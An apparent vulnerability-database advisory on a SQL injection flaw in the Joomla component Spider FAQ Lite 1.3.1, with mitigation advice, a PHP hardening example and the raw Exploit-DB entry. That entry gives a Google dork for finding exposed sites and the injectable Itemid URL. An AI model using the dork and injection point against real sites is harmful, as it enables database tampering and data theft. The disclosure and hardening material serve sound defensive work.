Vendor: Spider FAQ Lite
Author: Ihsan Sencan
CVSS: 8.8 (HIGH)
CWE: CWE-89 (SQL Injection)
Product Name: Spider FAQ Lite
Affected Version From: 1.3.1
Affected Version To: 1.3.1
Patch Exists: NO
Related CWE: N/A
CPE: a:web_dorado:spider_faq_lite
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win7 x64, Kali Linux x64
Year: 2017

Joomla! Component Spider FAQ Lite v1.3.1 – SQL Injection

A SQL injection vulnerability exists in Joomla! Component Spider FAQ Lite v1.3.1. An attacker can send a specially crafted HTTP request to the vulnerable application in order to execute arbitrary SQL commands in the back-end database. This can potentially result in the manipulation or disclosure of application data.

Mitigation:

Developers should never construct SQL statements directly from user input. Instead, parameterized statements should be used in order to prevent SQL injection attacks. Additionally, applications should perform input validation to ensure that input is of the correct type, length, format, and value.
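To make the mitigation concrete for a Joomla component that reads Itemid and faq_cats from the request, here is an added illustration (not Spider FAQ Lite's own code) using the Joomla 3.x API (JFactory, JInput, the JDatabaseQuery builder); the table, column and function names are hypothetical.

```php
<?php
// Added illustration for the mitigation above; not Spider FAQ Lite's own code.
// Uses the Joomla 3.x API (JFactory, JInput, the JDatabaseQuery builder);
// the table, column and function names are hypothetical.

// Vulnerable pattern: request values are concatenated straight into the SQL
// text, so a value that is not a plain number changes the statement itself.
function getFaqsUnsafe(JDatabaseDriver $db, $rawItemId, $rawCats)
{
    $sql = 'SELECT id, question, answer FROM #__faq_items'
         . ' WHERE menu_id = ' . $rawItemId
         . ' AND cat_id IN (' . trim($rawCats, ',') . ')';
    $db->setQuery($sql);
    return $db->loadObjectList();
}

// Hardened pattern: typed input getters and explicit integer casts ensure that
// only integers reach the statement, and the query builder quotes every
// identifier. A value such as faq_cats=",2,3," is reduced to a list of ints.
function getFaqsSafe(JDatabaseDriver $db, JInput $input)
{
    $menuId = $input->getInt('Itemid', 0);            // non-numeric input becomes 0
    $cats   = array_map('intval', explode(',', $input->getString('faq_cats', '')));
    $cats   = array_values(array_filter($cats));       // drop empty/zero entries
    if (empty($cats)) {
        return array();
    }

    $query = $db->getQuery(true)
        ->select($db->quoteName(array('id', 'question', 'answer')))
        ->from($db->quoteName('#__faq_items'))
        ->where($db->quoteName('menu_id') . ' = ' . (int) $menuId)
        ->where($db->quoteName('cat_id') . ' IN (' . implode(',', $cats) . ')');
    $db->setQuery($query);
    return $db->loadObjectList();
}

// Inside a component model the driver and input come from the application:
$db    = JFactory::getDbo();
$input = JFactory::getApplication()->input;
$rows  = getFaqsSafe($db, $input);
```

Because every value that reaches the WHERE clause has been cast to an integer, the statement's shape is fixed regardless of what the request carries.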

Exploit-DB raw data:

# # # # # 
# Exploit Title: Joomla! Component Spider FAQ Lite v1.3.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_spiderfaq
# Date: 16.02.2017
# Vendor Homepage: http://web-dorado.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/directory-a-documentation/faq/spider-faq-lite/
# Demo: http://demo.web-dorado.com/spider-faq.html
# Version: 1.3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=1&searchform=1&expand=0&Itemid=[SQL]
# # # # #